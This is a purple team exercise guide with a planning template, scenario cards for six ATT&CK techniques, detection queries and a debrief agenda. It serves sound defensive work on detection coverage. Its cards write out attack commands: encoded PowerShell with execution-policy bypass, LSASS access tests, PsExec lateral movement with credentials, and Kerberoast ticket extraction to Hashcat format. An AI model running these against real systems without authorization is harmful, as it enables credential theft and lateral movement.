Purple Team Exercise Guide: Planning Template, Attack Scenario Cards, and Gap Register

A traditional pentest tells you what an attacker can do. A purple team exercise tells you what your detection stack can see. These are different questions. Organizations that run purple team exercises quarterly improve their detection rate across MITRE ATT&CK techniques by an average of 22 percentage points within 12 months, according to a 2024 SANS survey of SOC teams. The collaborative format means detection gaps are identified and remediation starts the same day, not 6 weeks after a pentest report is delivered.

Use this template to plan each exercise. Fill in the blanks and share with participants 5 business days before the session.

Purple Team Exercise Brief

Date: [DATE] [START TIME]-[END TIME] Location/Bridge: [Zoom/Teams link or room] Red team lead: [NAME] Blue team lead: [NAME] Scribe: [NAME] Test environment: [Endpoint hostname/IP and OS, confirm isolated from production]

Threat actor focus: [e.g., "Ransomware affiliate TTPs consistent with LockBit/BlackCat initial access patterns"]

Scenarios to test (ordered by priority):

1. [ATT&CK technique ID and name]
2. [ATT&CK technique ID and name]
3. [ATT&CK technique ID and name]

Success criteria: [e.g., "Alert fires in SIEM within 5 minutes of technique execution for Tier 1 techniques"]

Out of scope: [e.g., "No active directory changes, no network scanning outside test VLAN, no email-based delivery"]

Escalation contact: [NAME/PHONE for any unexpected production impact]

Debrief: Last 30 minutes of session; output is a completed gap register

Subject: Purple Team Exercise -- [Threat Focus] -- [DATE]

Body:
This is a scheduled purple team exercise. Red and blue team members will collaboratively 
execute and detect ATT&CK techniques to validate our detection coverage.

Agenda:
- 0:00-0:10  Intro: scope, rules, shared doc setup
- 0:10-0:55  Scenario execution (3 scenarios, ~15 min each)
- 0:55-1:25  Debrief and gap register completion
- 1:25-1:30  Next steps and remediation owners

Required: Red team lead, Blue team lead, SOC analyst (on-call for exercise window)
Optional: Detection engineer, CISO/Security manager

Shared tracking doc: [LINK]
Test endpoint: [HOSTNAME]
Slack channel: #purple-team-[DATE]

Note: This exercise is authorized and coordinated. Alerts generated during the 
exercise window ([START]-[END]) are expected. Do not escalate without checking 
with the blue team lead first.

Technique: T1059.001 -- Command and Scripting Interpreter: PowerShell Threat actors that use this: Almost all ransomware affiliates, APT29, FIN7 Risk if undetected: Attacker can download and execute payloads, establish persistence, bypass application controls

Atomic to execute (Atomic Red Team):

# Test 1: Base64-encoded command execution
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Write-Host "Purple Team Test"'))
powershell.exe -EncodedCommand $encoded

# Test 2: Download cradle simulation (no actual download)
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression 'Write-Host PT-Test'"

Expected detection: EDR alert on PowerShell with -EncodedCommand flag; SIEM Sigma rule match on CommandLine containing '-enc' or '-EncodedCommand'

Sigma rule to validate:

title: Suspicious PowerShell Encoded Command
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-EncodedCommand'
      - '-enc '
      - '-ec '
  condition: selection
level: medium

Gap register entry if not detected: Sigma rule not deployed to SIEM / rule deployed but PowerShell logging not enabled / EncodedCommand flag logged but not parsed by log shipper

Technique: T1003.001 -- OS Credential Dumping: LSASS Memory Threat actors that use this: LockBit, BlackCat/ALPHV, Scattered Spider, APT28 Risk if undetected: All cached domain credentials compromised, enables lateral movement via Pass-the-Hash

Atomic to execute (safe simulation -- no actual credential extraction):

# Atomic Red Team test for LSASS access (uses procdump, no credential extraction)
Invoke-AtomicTest T1003.001 -TestNumbers 1

# Manual simulation: access lsass via tasklist (does not dump credentials)
tasklist /FI "IMAGENAME eq lsass.exe" /V

# Sysmon-visible process open handle simulation
Get-Process lsass | Select-Object Id, Name, Handles

Expected detection: Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe; EDR alert on procdump parent process or suspicious handle access to lsass

Windows Event ID check:

Event ID 10 (Sysmon): TargetImage = C:\Windows\System32\lsass.exe
CallTrace contains: C:\Windows\SYSTEM32\ntdll.dll+...
GrantedAccess: 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)

SIEM query to validate detection exists (Splunk):

index=sysmon EventCode=10 TargetImage="*lsass.exe"
| stats count by SourceImage, GrantedAccess, Computer
| sort -count

Gap register entry if not detected: Sysmon not deployed / Sysmon config does not include ProcessAccess events / lsass events filtered before SIEM ingestion

Technique: T1021.002 -- Remote Services: SMB/Windows Admin Shares Threat actors that use this: Most ransomware operators for spreading across the domain after initial access Risk if undetected: Attacker can move laterally to domain controllers and file servers undetected

Atomic to execute:

# PsExec simulation (requires PsExec downloaded to test endpoint)
# Use a test host pair -- never run against production
PsExec.exe \\TARGET-HOST -u DOMAIN\testuser -p testpass cmd.exe /c "hostname"

# Alternative: use Atomic Red Team
Invoke-AtomicTest T1021.002 -TestNumbers 1

Expected detection: Windows Event ID 7045 (new service installed) on target; Event ID 4624 (logon type 3) on target from source host; Sysmon Event ID 1 showing PsExec service binary written

SIEM query:

index=wineventlog EventCode=7045 ServiceName="PSEXESVC"
| stats count by ComputerName, ServiceFileName, _time

Gap register entry if not detected: Windows Security event logs not forwarded from servers / Event ID 7045 not parsed by log shipper / PsExec renamed to bypass name-based detection (also test with renamed binary)

Technique: T1558.003 -- Steal or Forge Kerberos Tickets: Kerberoasting Threat actors that use this: APT29, Scattered Spider, most domain-targeting ransomware affiliates Risk if undetected: Service account password hashes extracted and cracked offline; often leads to domain admin

Atomic to execute (in lab AD environment only):

# Requires: domain-joined test host, Rubeus or Invoke-Kerberoast
# Atomic Red Team:
Invoke-AtomicTest T1558.003 -TestNumbers 1

# Manual (PowerView):
Get-DomainSPNTicket -OutputFormat Hashcat | Out-File kerb-tickets.txt

Expected detection: Event ID 4769 (Kerberos service ticket request) with TicketEncryptionType 0x17 (RC4-HMAC) for an account that does not normally request service tickets; Sigma rule on unusual TGS request volume

Splunk query:

index=wineventlog EventCode=4769 TicketEncryptionType=0x17
| stats count by ServiceName, AccountName, IpAddress
| where count > 10
| sort -count

Mitigation to validate: Are high-value service accounts using AES256 encryption (etype 18)? Check: Get-ADUser -Filter {ServicePrincipalName -ne '$null'} -Properties * | Select-Object Name, ServicePrincipalName, msDS-SupportedEncryptionTypes

Technique: T1074.001 -- Data Staged: Local Data Staging Threat actors that use this: All ransomware affiliates conducting double-extortion; APT groups pre-exfiltration Risk if undetected: Attacker can compress and exfiltrate sensitive files undetected; provides leverage for extortion

Atomic to execute:

# Create test staging directory and compress files
New-Item -Path C:\Temp\PT-Staging -ItemType Directory
Copy-Item C:\Users\Public\Documents\* C:\Temp\PT-Staging\ -Recurse

# Compress with native PowerShell (simulates attacker behavior)
Compress-Archive -Path C:\Temp\PT-Staging -DestinationPath C:\Temp\PT-Data.zip

# Simulate 7zip compression (common attacker tool)
# 7z.exe a C:\Temp\PT-Data.7z C:\Temp\PT-Staging\

# Cleanup after test
Remove-Item C:\Temp\PT-Staging -Recurse
Remove-Item C:\Temp\PT-Data.zip

Expected detection: Sysmon Event ID 11 (file created) for .zip/.7z/.rar in unusual directories (Temp, ProgramData); EDR behavioral alert on large file compression activity; DLP alert on sensitive file pattern matches in archive

Gap register entry if not detected: No file creation monitoring for archive types / DLP not scanning compressed files / Staging in allowed directories (Downloads) that are excluded from monitoring

Technique: T1547.001 -- Boot or Logon Autostart Execution: Registry Run Keys Threat actors that use this: Common persistence mechanism across commodity malware, RATs, and ransomware droppers Risk if undetected: Attacker payload survives reboots; can maintain access indefinitely

Atomic to execute:

# Add test registry run key (removes itself on next run)
Reg Add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" `
  /v "PurpleTeamTest" `
  /t REG_SZ `
  /d "C:\Temp\PT-Test.exe" `
  /f

# Verify it was created
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name PurpleTeamTest

# Cleanup immediately
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name PurpleTeamTest

Expected detection: Sysmon Event ID 13 (RegistryEvent -- value set) on HKCU/HKLM Run keys; EDR alert on new autorun entry pointing to temp directory or unsigned binary

SIEM query:

index=sysmon EventCode=13 
  TargetObject="*\\CurrentVersion\\Run*"
| where NOT (Image IN (known_good_installers))
| stats count by Image, TargetObject, Details, ComputerName

Fill this in during the debrief. Export to CSV or paste into Jira as a parent epic with sub-tasks.

Alert Quality scoring:

• High: Alert fired, analyst could triage without additional investigation
• Medium: Alert fired but missing key fields (username, host, parent process)
• Low: Alert fired but would likely be noise / analyst would close it
• None: No alert

Run this agenda at the end of every purple team session:

0:00-0:05: Results summary Scribe reads out gap register: X of Y techniques detected, Z gaps identified.

0:05-0:15: Root cause discussion for each gap For each missed detection, answer: Was this a logging gap, a rule gap, or a tuning gap? Logging gap = the event isn't reaching the SIEM. Rule gap = no rule exists. Tuning gap = rule exists but was too noisy and disabled.

0:15-0:22: Remediation owners and dates For each gap, assign: detection engineer owner, target deployment date, and how to verify fix (re-test date).

0:22-0:28: What worked well Identify detections that fired with high fidelity. These are candidates to use as templates for similar techniques.

0:28-0:30: Next exercise scope Based on today's results, what threat actor TTPs should the next exercise focus on? Record this as the input to the next planning template.

Once you've run three or four exercises and the team is comfortable, scale the program:

Security champions model: Train engineers in each product team to run Atomic Red Team atomics against their own services quarterly. They report results back to the detection team. This gets you 10x the coverage without 10x the security team headcount.

Automated BAS between exercises: Use a behavioral attack simulation (BAS) platform like Cymulate, AttackIQ, or SafeBreach to run the same technique library on a weekly schedule automatically. This catches detection regressions introduced by SIEM rule changes or log pipeline updates.

Track detection coverage in MITRE ATT&CK Navigator: After each exercise, update your Navigator layer with which techniques are detected (green), detected with gaps (yellow), and not detected (red). This gives leadership a visual representation of detection maturity over time and drives prioritization for the next exercise cycle.